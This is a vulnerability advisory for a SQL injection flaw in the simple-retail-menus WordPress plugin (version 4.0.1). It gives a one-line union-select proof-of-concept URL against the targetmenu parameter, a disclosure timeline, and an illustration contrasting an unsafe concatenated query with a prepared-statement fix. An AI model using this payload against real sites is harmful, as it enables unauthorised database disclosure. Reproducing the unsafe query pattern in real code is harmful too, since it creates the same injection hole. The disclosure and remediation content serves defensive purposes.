wp-plugin : simple-retail-menus – A1-Injection


Plugin Details


Plugin Name : simple-retail-menus


Affected Version : 4.0.1 (and most probably lower versions, if any)

Vulnerability : A1-Injection
Identified by : Anant Shrivastava



Technical Details


Minimum Level of Access Required : Editor


PoC - (Proof of Concept) :


http://localhost/wp-admin/admin.php?page=jsrm-retail-menus&mode=edit&targetmenu=2 union select @@version,2,user(),database(),5,6,7,8


Vulnerable Parameter : targetmenu


Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=861170%40simple-retail-menus&old=728969%40simple-retail-menus&sfp_email=&sfph_mail=#file1
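As an added illustration (not the plugin's own code, which this advisory does not reproduce), the kind of query construction that lets a `targetmenu` value such as the one in the PoC reach the database as SQL, beside a form hardened with WordPress's own `$wpdb->prepare()`, an integer cast and a capability check; the function names, table name and capability are assumptions:

```php
<?php
// Hypothetical reconstruction of the unsafe pattern (not the plugin's code):
// the request parameter is concatenated straight into the SQL string, so a
// value like "2 union select ..." is executed as part of the query.
function jsrm_get_menu_unsafe( $wpdb ) {
    $target = $_GET['targetmenu'];
    $sql    = "SELECT * FROM {$wpdb->prefix}jsrm_menus WHERE id = " . $target;
    return $wpdb->get_row( $sql );
}

// Hardened form: the caller must hold an editing capability, the id is
// coerced to a non-negative integer with absint(), and the value is bound
// through $wpdb->prepare() so it can never change the query structure.
function jsrm_get_menu_safe( $wpdb ) {
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_die( 'Insufficient permissions' );
    }
    // absint() turns "2 union select ..." into 2 and non-numeric input into 0.
    $target = isset( $_GET['targetmenu'] ) ? absint( $_GET['targetmenu'] ) : 0;
    if ( 0 === $target ) {
        return null; // no valid menu id supplied
    }
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}jsrm_menus WHERE id = %d",
        $target
    );
    return $wpdb->get_row( $sql );
}
```

The `%d` placeholder is what makes the difference: even if the integer cast were omitted, `prepare()` would bind the value rather than splice it into the statement.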


Disclosure Timeline


Vendor Contacted : 2013-12-25

Plugin Status : Updated on 2014-02-19
Public Disclosure : May 28, 2014
CVE Number : Not assigned yet

Plugin Description :
Perfect for salon, restaurant, and retail store websites, as well as many other applications. Simple Retail Menus lets you create and manage menu-type lists for display in a post or page. This is a free, full-featured plugin. Create as many menus as you want, add as many items as you want to any menu, add menus to any post or page on your WordPress site.

It's simple and easy to use! Just build your menus, then copy/paste the resulting 'shortcode' into your post or page.

Example of a shortcode: [simple-retail-menu id="1"]
